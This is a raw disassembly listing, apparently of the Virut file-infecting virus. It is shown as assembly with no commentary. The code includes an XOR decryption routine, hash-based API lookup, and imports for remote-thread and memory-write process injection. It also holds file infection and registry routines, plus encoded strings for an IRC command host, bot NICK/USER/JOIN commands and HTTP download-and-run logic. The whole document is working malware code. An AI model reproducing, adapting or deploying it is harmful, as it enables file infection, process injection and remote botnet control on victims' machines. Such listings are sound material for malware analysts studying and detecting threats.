; ---------------------------------------------------------------------------
loc_42E3E1: ; CODE XREF: .RLPack:0042E3DA�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_42E407+2
inc ebx
insb
outsd
jnb short near ptr loc_42E465+2
dec eax
popa
outsb
db 64h
insb
loc_42E407: ; CODE XREF: .RLPack:0042E3F8�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_42E423+1
inc ebx
jb short near ptr loc_42E47E+1
popa
jz short near ptr loc_42E47E+4
inc ebp
jbe short near ptr loc_42E484+1
outsb
jz short near ptr loc_42E462+2
loc_42E423: ; CODE XREF: .RLPack:0042E412�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_42E43F
inc edi
db 65h
jz short near ptr loc_42E47E+4
popa
jnb short loc_42E4AD
inc ebp
jb short near ptr loc_42E4AD+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_42E43F proc near ; CODE XREF: .RLPack:0042E42D�p
; FUNCTION CHUNK AT 0042E4E8 SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 0042E628 SIZE 0000013A BYTES
push ebx
call esi
mov [ebp+403544h], eax
call sub_42E4BD
test eax, eax
jz short loc_42E472
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_42E46C
lea eax, [ebp+4011D2h]
loc_42E462: ; CODE XREF: .RLPack:0042E421�j
mov dl, [eax-1]
loc_42E465: ; CODE XREF: .RLPack:0042E400�j
call sub_42E4D8
jmp short loc_42E4E8
; ---------------------------------------------------------------------------
loc_42E46C: ; CODE XREF: sub_42E43F+1B�j
; sub_42E43F+136�j ...
call dword ptr [ebp+40353Ch]
loc_42E472: ; CODE XREF: sub_42E43F+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_42E49C
loc_42E47E: ; CODE XREF: .RLPack:0042E418�j
; .RLPack:0042E41B�j ...
lea esi, [ebp+403435h]
loc_42E484: ; CODE XREF: .RLPack:0042E41E�j
mov edi, [esp+4]
movsb
movsd
mov ebx, dword ptr ss:loc_4039B2[ebp]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_42E49C: ; CODE XREF: sub_42E43F+3D�j
pop ebp
retn
sub_42E43F endp
; ---------------------------------------------------------------------------
loc_42E49E: ; CODE XREF: sub_42E4BD+2�p
; sub_42E43F:loc_42E6A7�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_42E4AD: ; CODE XREF: .RLPack:0042E437�j
; .RLPack:0042E43A�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
db 0
; =============== S U B R O U T I N E =======================================
sub_42E4BD proc near ; CODE XREF: sub_42E43F+9�p
xor ecx, ecx
call loc_42E49E
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_42E4BD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E4D8 proc near ; CODE XREF: sub_42E43F:loc_42E465�p
; sub_4302AC+25B�p
mov dh, dl
mov ecx, 225Fh
loc_42E4DF: ; CODE XREF: sub_42E4D8+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_42E4DF
retn
sub_42E4D8 endp
; ---------------------------------------------------------------------------
db 0F4h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E43F
loc_42E4E8: ; CODE XREF: sub_42E43F+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr ss:loc_401584[ebp], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr ss:loc_40397E[ebp]
loc_42E50F: ; CODE XREF: sub_42E43F+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add dword ptr ss:loc_40397E[ebp], edx
loop loc_42E50F
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, loc_403558[ebp]
mov cl, 1Eh
call sub_42E8A2
pop edi
call dword ptr ss:loc_403594[ebp]
shr eax, 1Fh
jz loc_42E628
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov dword ptr ss:loc_403550[ebp], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_42E46C
xchg eax, edi
lea esi, sub_401000[ebp]
mov ebp, edi
mov ecx, 0A74h
sub ebp, offset sub_401000
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_42E43F
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr ss:loc_403550[ebp]
add esp, 20h
test eax, eax
jz loc_42E46C
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr ss:loc_403550[ebp]
test eax, eax
jz loc_42E46C
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr ss:loc_403550[ebp]
push 1000Ah
call dword ptr ss:loc_403550[ebp]
call sub_42E618
jmp loc_42E46C
; =============== S U B R O U T I N E =======================================
sub_42E618 proc near ; CODE XREF: .RLPack:0042E60E�p
; sub_42E618+D�j
push 1
pop ecx
jecxz short locret_42E627
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_42E618
; ---------------------------------------------------------------------------
locret_42E627: ; CODE XREF: sub_42E618+3�j
retn
sub_42E618 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E43F
loc_42E628: ; CODE XREF: sub_42E43F+10F�j
cmp dword ptr [ebp+403570h], 0
jz loc_42E46C
call near ptr loc_42E63F+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_42E63F: ; CODE XREF: sub_42E43F+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_42E65C+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_42E8A2
loc_42E65C: ; CODE XREF: sub_42E43F+209�j
cmp dword ptr [ebp+4035F8h], 0
jz loc_42E46C
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, [ebp+4035E8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, dword ptr ss:loc_4035D8[ebp]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_42E6A7
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_42E6A7: ; CODE XREF: sub_42E43F+25D�j
call loc_42E49E
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_42E6EC: ; CODE XREF: sub_42E43F+2B0�j
lodsb
stosw
loop loc_42E6EC
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_42E46C
lea esi, sub_401000[ebp]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, offset sub_401000
lea eax, [ebp+40144Ch]
jmp eax
; END OF FUNCTION CHUNK FOR sub_42E43F
; ---------------------------------------------------------------------------
dw 958Dh
dd offset loc_4018DF+1
dd 9C95FF52h, 0E8004035h, 16h
aLookupprivileg db 'LookupPrivilegeValueA',0
dw 0FF50h
dd 40354895h, 4C858900h, 50004035h, 6A206A54h, 0EC95FFFFh
dd 85004035h, 3F755FC0h, 56026A96h, 6AD48B56h, 11E85201h
dd 53000000h, 62654465h, 72506775h, 6C697669h, 656765h
dd 4C95FF56h, 8B004035h, 565656C4h, 0FF575650h, 4035D095h
dd 10C48300h, 3C95FF57h, 6A004035h, 0FF026A00h, 40357095h
dd 128B900h, 2B970000h, 240C89E1h, 95FF5754h, 4035ACh
dd 0A583F633h, 40363Ch, 0FF575400h, 4035B095h, 74C08500h
dd 0FE83465Ch, 0FFEE7204h, 6A082474h, 0FF2A6A00h, 4035A895h
dd 74C08500h, 3DE893DCh, 33000004h, 30E391C9h, 363C8539h
dd 28750040h, 0DAEC181h, 54500000h, 50515650h, 95FF5350h
dd 403568h, 7459C085h, 2474FF0Fh, 3C858F08h, 0E8004036h
dd 0FFFFFDACh, 3C95FF53h, 0EB004035h, 28C48198h, 57000001h
dd 353C95FFh, 0E5E90040h, 8DFFFFFBh, 58580049h, 29CE0058h
dd 0D650000h, 3 dup(0)
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_42E8A2 proc near ; CODE XREF: sub_42E43F+100�p
; sub_42E43F+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_42E8AD: ; CODE XREF: sub_42E8A2+E�j
lodsb
test al, al
jnz short loc_42E8AD
loop sub_42E8A2
retn
sub_42E8A2 endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea_0 db 'CreateFileA',0
aCreatefilema_0 db 'CreateFileMappingA',0
aCreateproces_0 db 'CreateProcessA',0
aCreateremoteth db 'CreateRemoteThread',0
aCreatethread_0 db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime_0 db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoff_0 db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend_0 db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetc_0 db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll_0 db 'ADVAPI32.DLL',0
aRegclosekey_0 db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_42EC3D proc near ; CODE XREF: .RLPack:0042ECE4�p
; .RLPack:0042ECF5�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr ss:loc_4035F4[ebp]
add esp, 8
retn
sub_42EC3D endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr ss:loc_4035A4[ebp]
test eax, eax
jz loc_42ED20
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_42ED20
mov ecx, [ebp+401588h]
jecxz short loc_42ECD8
lea edx, sub_401000[ebp]
add edx, ecx
push edi
push ebx
call edx
loc_42ECD8: ; CODE XREF: .RLPack:0042ECCA�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_42EC3D
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_42EC3D
mov eax, dword ptr ss:loc_4035D8[ebp]
lea ecx, [edi+23E8h]
call sub_42EC3D
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_42ED20
lea ecx, [edi+23F5h]
call sub_42EC3D
loc_42ED20: ; CODE XREF: .RLPack:0042EC8A�j
; .RLPack:0042ECC2�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h
dd 0E8h, 0ED815D00h, 401A43h, 958DFF6Ah, 401A0Eh, 20CD5250h
dd 2A0024h, 660CC483h, 1A5485C7h, 20CD0040h, 1A5685C7h
dd 240040h, 0C35D002Ah, 16A016Ah, 73FF33FFh, 8515FF04h
dd 68F074C0h, 0Bh, 35BD08Bh, 0B58D3C50h, 401A72h, 10CBA8Bh
dd 8A8B0000h, 108h, 0CB2BF803h, 0F3CB8B60h, 57461A6h, 0EBF5E247h
dd 0FC783C2h, 53D48B57h, 5450CC8Bh, 5251406Ah, 95FFFF6Ah
dd 4035F0h, 8B0CC483h, 40357495h, 83D72B00h, 7C707EAh
dd 0E8006Ah, 0C3035789h, 0E8581A6Ah, 9, 0AA61428Dh, 0F075C9FEh
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_42EE05 proc near ; CODE XREF: sub_42F670+1B�p
; sub_42F7E8+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_42EE05 endp
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B09ED81h, 9D8B0040h, 40364Ah, 8247C83h
dd 0B9840F00h, 81000000h, 208ECh, 4685400h, 0FF000001h
dd 40359095h, 8DFC8B00h, 1042484h, 6A500000h, 4E800h, 52560000h
dd 0FF570054h, 40358C95h, 8DC93300h, 10497h, 6A515100h
dd 16A5102h, 68h, 95FF5240h, 40355Ch, 74F68596h, 6854505Bh
dd 104h, 24B4FF57h, 220h, 362895FFh, 85590040h, 0E31674C0h
dd 0D48B5014h, 5152006Ah, 95FF5657h, 4035CCh, 75C08559h
dd 95FF56D0h, 40353Ch, 5244578Dh, 58446A57h, 104978Dh
dd 33AB0000h, 59106AC0h, 5050ABF3h, 50505050h, 95FF5250h
dd 403564h, 208C481h, 74FF0000h, 95FF0824h, 403618h, 1895FF53h
dd 5D004036h, 800004C2h, 1750A3Eh, 848D8B46h, 0E3004015h
dd 958D19h, 3004010h, 0D2FF56D1h, 880FC084h, 11Fh, 110840Fh
dd 3E800000h, 4610753Ah, 0F003E80h, 10184h, 203E8000h
dd 8146F175h, 4E49503Eh, 8B427547h, 146C6CFh, 51CE2B4Fh
dd 5651006Ah, 1095FF53h, 59004036h, 850FC13Bh, 0DFh, 1DA2858Dh
dd 6A0040h, 0C68h, 0FF535000h, 40361095h, 0C3D00h, 850F0000h
dd 0BFh, 0B1E9h, 503E8100h, 0F564952h, 0A585h, 8C68300h
dd 0F0D3CACh, 9984h, 75203C00h, 3A3CACF3h, 8C850Fh, 0DAD0000h
dd 20202020h, 6567213Dh, 0AC7F7574h, 7C75203Ch, 20FF7E81h
dd 75747468h, 37E8171h, 2F2F3A70h, 47C66875h, 310F00FFh
dd 2710BAh, 52E2F700h, 35BC95FFh, 0C0330040h, 50505050h
dd 9E8h, 776F4400h, 616F6C6Eh, 95FF0064h, 403620h, 3674C085h
dd 8589C933h, 40364Ah, 2006851h, 51518000h, 95FF5056h
dd 403624h, 1B03958Dh, 33500040h, 505154C9h, 0FF515152h
dd 40356C95h, 24048700h, 353C95FFh, 0C3F80040h, 15778D80h
dd 0F9010040h, 464F53C3h, 52415754h, 694D5C45h, 736F7263h
dd 5C74666Fh, 646E6957h, 5C73776Fh, 72727543h, 56746E65h
dd 69737265h, 455C6E6Fh, 6F6C7078h, 726572h, 67726154h
dd 6F487465h, 2007473h, 0F0FF00h, 70000000h, 69786F72h
dd 72692E6Dh, 6C616763h, 2E797861h, 4E006C70h, 204B4349h
dd 6E646371h, 726F7A6Dh, 4553550Ah, 30732052h, 30353032h
dd 202E2031h, 2D3A202Eh, 4E494F4Ah, 69762620h, 0A757472h
dd 0E855h, 815D0000h, 401DB4EDh, 7785C600h, 4015h, 359495FFh
dd 0E8C10040h, 6A3C741Fh, 50B58B1Eh, 59004035h, 752E3CACh
dd 3E81662Ah, 23751DFFh, 3640BD8Dh, 768B0040h, 66A55702h
dd 6A858DA5h, 8F004033h, 40339085h, 4689FA00h, 0FE4E8CFAh
dd 0E201B1FBh, 8D43EBCFh, 4015B185h, 6A5000h, 95FF0E6Ah
dd 4035A4h, 8247C83h, 0E82B7504h, 4, 434653h, 358895FFh
dd 48E80040h, 0E8FFFFFCh, 7, 5F434653h, 0FF00534Fh, 40358895h
dd 0FC31E800h, 56E8FFFFh, 0FFFFFFF3h, 4013038Dh, 0BE800h
dd 53550000h, 32335245h, 4C4C442Eh, 9C95FF00h, 0E8004035h
dd 0Ah, 72707377h, 66746E69h, 0FF500041h, 40354895h, 54858900h
dd 0F004035h, 0E08D8D31h, 89004018h, 40364685h, 95FF5100h
dd 40359Ch, 46893h, 0B58D0000h, 4018EDh, 2CBD8D59h, 0E8004036h
dd 0FFFFF6D6h, 6785C766h, 0FF00401Dh, 69A583F0h, 401Dh
dd 1D27958Dh, 54500040h, 6A016Ah, 26852h, 95FF8000h, 403630h
dd 755AC085h, 5A8D8D22h, 5200401Dh, 0B58D066Ah, 401D67h
dd 50505654h, 95FF5251h, 403634h, 2C95FF58h, 0C6004036h
dd 40384D85h, 0CE80000h, 57000000h, 4B434F53h, 442E3233h
dd 0FF004C4Ch, 40359C95h, 7689300h, 8D000000h, 401844B5h
dd 0BD8D5900h, 4035FCh, 0FFF651E8h, 0CE8FFh, 49570000h
dd 454E494Eh, 4C442E54h, 95FF004Ch, 40359Ch, 840FC085h
dd 1E7h, 56893h, 0B58D0000h, 401882h, 18BD8D59h, 0E8004036h
dd 0FFFFF61Ah, 361CBD83h, 0F000040h, 1C284h, 90EC8100h
dd 54000001h, 10168h, 0FC95FF00h, 81004035h, 190C4h, 0D48B5000h
dd 0FF52006Ah, 40361C95h, 59C08500h, 88680D75h, 0FF000013h
dd 4035BC95h, 83E2EB00h, 401D69BDh, 29750000h, 1D6D858Dh
dd 0FF500040h, 40360895h, 0FC08500h, 13B84h, 0C408B00h
dd 30FF008Bh, 1D69858Fh, 85C60040h, 40384Dh, 6A006A01h
dd 0FF026A01h, 40361495h, 0FFF88300h, 112840Fh, 8D930000h
dd 401D6595h, 52106A00h, 495FF53h, 85004036h, 0F2850FC0h
dd 8D000000h, 401D86BDh, 0E808B100h, 0FFFFFABCh, 9468h
dd 0E62B5E00h, 54243489h, 359895FFh, 0BD8D0040h, 401D94h
dd 9DE801B1h, 8BFFFFFAh, 0C1102444h, 440B08E0h, 0E0C10424h
dd 24440B08h, 5E85008h, 25000000h, 78362Eh, 5495FF57h
dd 83004035h, 47C60CC4h, 958D2006h, 401D81h, 2168006Ah
dd 52000000h, 1095FF53h, 8D004036h, 5714247Ch, 355895FFh
dd 4C60040h, 6A400A38h, 53575000h, 361095FFh, 0E6030040h
dd 1DA2BD8Dh, 6A0040h, 0C68h, 0FF535700h, 40361095h, 0C3D00h
dd 4D750000h, 364EB58Dh, 8D8D0040h, 40384Dh, 6ACE2Bh, 0FF535651h
dd 40360C95h, 0F88300h, 8B912F7Eh, 4EB58DFEh, 0B0004036h
dd 75AEF20Dh, 0F8E86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 4EBD8DCEh, 0F3004036h, 0EBF787A4h, 95FF53B9h
dd 403600h, 1577BD80h, 74010040h, 7530682Ah, 95FF0000h
dd 4035BCh, 384DBD80h, 74000040h, 6985C711h, 401Dh, 0C6000000h
dd 40384D85h, 56E90000h, 0C7FFFFFEh, 40158085h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 84040A0Dh
dd 79ED30C7h, 59574FD4h, 8B993AABh, 7AB4DB85h, 1429050Bh
dd 141310A6h, 0A1A810A6h, 0AD474CA2h, 9736299h, 0F96AD8ADh
dd 5248606Eh, 0CC5C4037h, 0FAE5C26Ch, 0B39727B1h, 69DF43F2h
dd 0DA2353AFh, 0CE22A5FAh, 0C17E6980h, 0B3521A73h, 86DD8B8h
dd 10F2h, 0Ah dup(0)
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_42F5BA proc near ; CODE XREF: sub_42F601:loc_42F65E�p
; sub_42F6C1+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr ss:loc_4039AA[ebp], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_42F5D6: ; CODE XREF: sub_42F5BA+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_42F5F8
cmp eax, [edx+8]
jnb short loc_42F5F8
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov dword ptr ss:loc_4039AA[ebp], eax
jmp short loc_42F5FD
; ---------------------------------------------------------------------------
loc_42F5F8: ; CODE XREF: sub_42F5BA+23�j
; sub_42F5BA+28�j
add edx, 28h
loop loc_42F5D6
loc_42F5FD: ; CODE XREF: sub_42F5BA+3C�j
popa
retn 4
sub_42F5BA endp
; =============== S U B R O U T I N E =======================================
sub_42F601 proc near ; CODE XREF: .RLPack:0042F92D�p
; .RLPack:0042F953�p
mov byte ptr ss:loc_4022F7[ebp], al
call sub_42F670
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_42F618: ; CODE XREF: sub_42F601+1E�j
cmp [eax], ebx
jz short loc_42F628
add eax, 4
loop loc_42F618
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_42F628: ; CODE XREF: sub_42F601+19�j
neg ecx
add ecx, dword ptr ss:loc_4022F7[ebp]
jecxz short loc_42F642
loc_42F632: ; CODE XREF: sub_42F601+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_42F632
mov [ebp+402224h], ebx
loc_42F642: ; CODE XREF: sub_42F601+2F�j
; sub_42F670+34�j
cmp dword ptr [edx], 0
jz short loc_42F64C
sub esi, [edx]
add esi, [edx+10h]
loc_42F64C: ; CODE XREF: sub_42F601+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_42F65B
push dword ptr [edx]
jmp short loc_42F65E
; ---------------------------------------------------------------------------
loc_42F65B: ; CODE XREF: sub_42F601+54�j
push dword ptr [edx+10h]
loc_42F65E: ; CODE XREF: sub_42F601+58�j
call sub_42F5BA
sub ecx, esi
sub ecx, dword ptr ss:loc_4039AA[ebp]
pop eax
add ecx, [ebx+34h]
retn
sub_42F601 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42F670 proc near ; CODE XREF: sub_42F601+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_42F6C1
mov eax, [ebp+40398Eh]
call sub_42EE05
call sub_42F6AD
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_42F6A6
mov dword ptr ss:loc_4022A0[ebp], ebx
jmp short loc_42F642
; ---------------------------------------------------------------------------
loc_42F6A6: ; CODE XREF: sub_42F670+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_42F670 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42F6AD proc near ; CODE XREF: sub_42F670+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_42F6C1
xor ecx, ecx
retn
sub_42F6AD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42F6C1 proc near ; CODE XREF: sub_42F670+10�p
; sub_42F6AD+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_42F5BA
add edx, dword ptr ss:loc_4039AA[ebp]
add edx, esi
loc_42F6D5: ; CODE XREF: sub_42F6C1+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_42F7E6
cmp dword ptr [edx+10h], 0
jz locret_42F7E6
mov eax, [edx+0Ch]
push eax
call sub_42F5BA
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, esi
push eax
loc_42F6FB: ; CODE XREF: sub_42F6C1+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_42F71B
cmp cl, 2Eh
jz short loc_42F70A
loc_42F707: ; CODE XREF: sub_42F6C1+58�j
inc eax
jmp short loc_42F6FB
; ---------------------------------------------------------------------------
loc_42F70A: ; CODE XREF: sub_42F6C1+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_42F707
loc_42F71B: ; CODE XREF: sub_42F6C1+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_42F7DE
cmp word ptr [eax-2], 3233h
jnz loc_42F7DE
push esi
cmp dword ptr [edx], 0
jnz short loc_42F73E
mov ecx, [edx+10h]
jmp short loc_42F740
; ---------------------------------------------------------------------------
loc_42F73E: ; CODE XREF: sub_42F6C1+76�j
mov ecx, [edx]
loc_42F740: ; CODE XREF: sub_42F6C1+7B�j
add esi, ecx
push ecx
call sub_42F5BA
add esi, dword ptr ss:loc_4039AA[ebp]
loc_42F74E: ; CODE XREF: sub_42F6C1+90�j
; sub_42F6C1+117�j
lodsd
test eax, eax
js short loc_42F74E
jz loc_42F7DD
push dword ptr ss:loc_4039AA[ebp]
push eax
call sub_42F5BA
add eax, dword ptr ss:loc_4039AA[ebp]
pop dword ptr ss:loc_4039AA[ebp]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_42F77A: ; CODE XREF: sub_42F6C1+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_42F791
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_42F77A
; ---------------------------------------------------------------------------
loc_42F791: ; CODE XREF: sub_42F6C1+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_42F7D7
cmp ebx, 0DB6E45A8h
jz short loc_42F7D7
cmp ebx, 0FFA13B59h
jz short loc_42F7D7
cmp ebx, 0ACB522D6h
jz short loc_42F7D7
cmp ebx, 0F358E993h
jz short loc_42F7D7
cmp ebx, 0F358E97Dh
jz short loc_42F7D7
cmp ebx, 0E1253F46h
jz short loc_42F7D7
cmp ebx, 0E1253F30h
jz short loc_42F7D7
call dword ptr [ebp+403992h]
loc_42F7D7: ; CODE XREF: sub_42F6C1+D6�j
; sub_42F6C1+DE�j ...
pop ebx
jmp loc_42F74E
; ---------------------------------------------------------------------------
